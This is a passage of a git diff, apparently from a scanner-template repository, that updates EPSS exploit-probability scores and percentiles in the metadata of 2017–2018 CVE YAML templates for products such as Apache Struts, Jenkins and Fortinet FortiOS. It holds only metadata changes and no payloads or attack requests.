epss-percentile: 0.53603 + epss-percentile: 0.53703 cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 11c7eb248e..bf0f287530 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-9416 cwe-id: CWE-22 epss-score: 0.01037 - epss-percentile: 0.82181 + epss-percentile: 0.82265 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 49a2ed119a..fe46281b14 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-9506 cwe-id: CWE-918 epss-score: 0.00575 - epss-percentile: 0.75453 + epss-percentile: 0.75564 cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 1e534b42da..d88861b464 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-9791 cwe-id: CWE-20 epss-score: 0.97448 - epss-percentile: 0.99945 + epss-percentile: 0.99947 cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index e8099cee4b..9a844dfe1d 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 - epss-score: 0.97545 - epss-percentile: 0.99994 + epss-score: 0.97537 + epss-percentile: 0.99995 cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index cbbec7ac42..71c8046473 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 - epss-score: 0.96098 - epss-percentile: 0.99356 + epss-score: 0.96287 + epss-percentile: 0.99425 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 9f4a7adbec..e53965242d 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-9833 cwe-id: CWE-22 epss-score: 0.35156 - epss-percentile: 0.96711 + epss-percentile: 0.96738 cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index d3cc71b009..66be7364ef 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-9841 cwe-id: CWE-94 epss-score: 0.97484 - epss-percentile: 0.99968 + epss-percentile: 0.99966 cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:* metadata: max-request: 6 diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 35aa74df43..dffe69f984 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -18,9 +18,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-0127 - cwe-id: CWE-200,CWE-306 + cwe-id: CWE-306,CWE-200 epss-score: 0.09982 - epss-percentile: 0.94284 + epss-percentile: 0.94323 cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 83e657f4d0..08d54df7f0 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-0296 cwe-id: CWE-22,CWE-20 - epss-score: 0.97381 - epss-percentile: 0.99894 + epss-score: 0.9742 + epss-percentile: 0.99923 cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index c00a43fb41..04cad08a83 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-1000129 cwe-id: CWE-79 epss-score: 0.00257 - epss-percentile: 0.63293 + epss-percentile: 0.63446 cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 8b7ba62b87..24499bb46b 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-1000130 cwe-id: CWE-74 epss-score: 0.89191 - epss-percentile: 0.98455 + epss-percentile: 0.98492 cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index f2375e142c..c621f2addf 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000226 cwe-id: CWE-732 - epss-score: 0.01552 - epss-percentile: 0.85716 + epss-score: 0.01309 + epss-percentile: 0.84446 cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index a33ea7639e..fbf8104906 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-1000533 cwe-id: CWE-20 epss-score: 0.97242 - epss-percentile: 0.99806 + epss-percentile: 0.99812 cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index c05c2d8c9f..80e2041567 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-1000600 cwe-id: CWE-200 epss-score: 0.95625 - epss-percentile: 0.99245 + epss-percentile: 0.99268 cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index f9b6b8bb16..2ee0cdabb8 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-1000671 cwe-id: CWE-601 epss-score: 0.00745 - epss-percentile: 0.78767 + epss-percentile: 0.78867 cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index b072657853..7f88e21f1d 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1000856 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.41007 + epss-percentile: 0.41079 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index b86a645e7e..6afe3159f6 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000861 cwe-id: CWE-502 - epss-score: 0.97112 - epss-percentile: 0.99732 + epss-score: 0.97215 + epss-percentile: 0.99796 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index 5ac89727c3..aa13645e44 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-10093 cwe-id: CWE-862 epss-score: 0.06287 - epss-percentile: 0.92861 + epss-percentile: 0.92903 cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index e7c5711f9f..9a8f185692 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-10095 cwe-id: CWE-79 epss-score: 0.95296 - epss-percentile: 0.99173 + epss-percentile: 0.99192 cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index c00e1e0697..af68983add 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46916 + epss-percentile: 0.47029 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 73ab51ed55..fc6baa0491 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-10201 cwe-id: CWE-22 epss-score: 0.04525 - epss-percentile: 0.91583 + epss-percentile: 0.91637 cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 02b4122bb2..e8555732d9 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-10230 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46203 + epss-percentile: 0.46318 cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 2ae9f2ceb2..003492d353 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-10562 cwe-id: CWE-78 epss-score: 0.97441 - epss-percentile: 0.99942 + epss-percentile: 0.99945 cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index f3fa73c233..9a57b06fb3 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-10822 cwe-id: CWE-22 epss-score: 0.10309 - epss-percentile: 0.94383 + epss-percentile: 0.94411 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index 1b179af403..c7f51bb5e9 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-10823 cwe-id: CWE-78 epss-score: 0.96737 - epss-percentile: 0.99581 + epss-percentile: 0.99588 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 70d8dba8fd..50fa3a3e3f 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-10956 cwe-id: CWE-22 epss-score: 0.57917 - epss-percentile: 0.97391 + epss-percentile: 0.97423 cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index b182bc4d44..96cdd9c109 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-11227 cwe-id: CWE-79 epss-score: 0.02667 - epss-percentile: 0.89275 + epss-percentile: 0.89322 cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index e6dfd5dc1f..d1d2cea4e9 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-11231 cwe-id: CWE-89 epss-score: 0.00903 - epss-percentile: 0.80874 + epss-percentile: 0.80953 cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 3c752fbbc9..6ebc76edfa 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - epss-score: 0.89557 - epss-percentile: 0.98478 + epss-score: 0.81162 + epss-percentile: 0.98059 cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 17df84a490..3cbc959913 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-11473 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40139 + epss-percentile: 0.40212 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 5e23de622d..db9bdf5071 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-11709 cwe-id: CWE-79 epss-score: 0.00151 - epss-percentile: 0.5109 + epss-percentile: 0.51176 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 08255b6ab6..d107655a4d 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-11759 cwe-id: CWE-22 epss-score: 0.96598 - epss-percentile: 0.99523 + epss-percentile: 0.99536 cpe: cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index c2bff933dd..b008252432 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.1 cve-id: CVE-2018-11776 cwe-id: CWE-20 - epss-score: 0.9755 - epss-percentile: 0.99995 + epss-score: 0.97505 + epss-percentile: 0.99981 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index eaaa87a95e..491e60fcb3 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 - epss-score: 0.86178 - epss-percentile: 0.98277 + epss-score: 0.83718 + epss-percentile: 0.98183 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index f41b076bb3..13062ac44f 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12031 cwe-id: CWE-22 epss-score: 0.01411 - epss-percentile: 0.84959 + epss-percentile: 0.85052 cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 2ac3902371..626c40c114 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-12054 cwe-id: CWE-22 epss-score: 0.36029 - epss-percentile: 0.96751 + epss-percentile: 0.96776 cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 57c97ce58e..988c7ed081 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -24,7 +24,7 @@ info: cve-id: CVE-2018-1207 cwe-id: CWE-94 epss-score: 0.01875 - epss-percentile: 0.87074 + epss-percentile: 0.87126 cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 07a2417384..f102950945 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-12095 cwe-id: CWE-79 epss-score: 0.00333 - epss-percentile: 0.67986 + epss-percentile: 0.68149 cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 48f1392013..39b96ccd3d 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12296 cwe-id: CWE-732 - epss-score: 0.01545 - epss-percentile: 0.85675 + epss-score: 0.01386 + epss-percentile: 0.84924 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 961af41ca2..4ff49cb38e 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12300 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45579 + epss-percentile: 0.45685 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 966099b72f..d210380745 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 - epss-score: 0.97446 - epss-percentile: 0.99943 + epss-score: 0.97423 + epss-percentile: 0.99926 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 23d3d66ae1..5b1c0c4899 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-12634 cwe-id: CWE-200 epss-score: 0.95531 - epss-percentile: 0.99226 + epss-percentile: 0.99245 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 56f94483c3..f2f8a23f94 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-12675 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45579 + epss-percentile: 0.45685 cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index a7bfc04969..de1b80c5cf 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-1271 cwe-id: CWE-22 epss-score: 0.004 - epss-percentile: 0.70668 + epss-percentile: 0.70833 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 8470dadd4b..8c331e1adb 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -26,7 +26,7 @@ info: cve-id: CVE-2018-1273 cwe-id: CWE-20,CWE-94 epss-score: 0.97498 - epss-percentile: 0.99976 + epss-percentile: 0.99977 cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 2f1beffd03..308a18a352 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12909 cwe-id: CWE-22 epss-score: 0.01119 - epss-percentile: 0.82897 + epss-percentile: 0.82993 cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index c90ae4e311..94b3840027 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12998 cwe-id: CWE-79 epss-score: 0.96915 - epss-percentile: 0.99648 + epss-percentile: 0.99655 cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 36d27fb37b..b1976ccaf5 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -19,7 +19,7 @@ info: cvss-score: 8.1 cve-id: CVE-2018-1335 epss-score: 0.96734 - epss-percentile: 0.99579 + epss-percentile: 0.99585 cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index c2515f4352..a2b1473968 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-13379 cwe-id: CWE-22 - epss-score: 0.97257 - epss-percentile: 0.99815 + epss-score: 0.97305 + epss-percentile: 0.99854 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index 119d1e900d..5c17dd4e08 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46203 + epss-percentile: 0.46318 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 6e743b4d21..7ffe010851 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-13980 cwe-id: CWE-22 epss-score: 0.0018 - epss-percentile: 0.5505 + epss-percentile: 0.55215 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 8d0f87fda2..4e81bee449 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14013 cwe-id: CWE-79 - epss-score: 0.00512 - epss-percentile: 0.73955 + epss-score: 0.00755 + epss-percentile: 0.7903 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index d5ae6c991f..04be098db3 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14064 cwe-id: CWE-22 epss-score: 0.15741 - epss-percentile: 0.9539 + epss-percentile: 0.95409 cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 5243a776fb..de2030dcf3 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-14474 cwe-id: CWE-601 epss-score: 0.00068 - epss-percentile: 0.28156 + epss-percentile: 0.28116 cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 7d83ed2fec..cca648cc82 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14574 cwe-id: CWE-601 - epss-score: 0.01218 - epss-percentile: 0.83706 + epss-score: 0.00828 + epss-percentile: 0.8008 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index e04fd74fed..063f5caf3f 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14728 cwe-id: CWE-918 - epss-score: 0.96381 - epss-percentile: 0.9944 + epss-score: 0.96369 + epss-percentile: 0.99454 cpe: 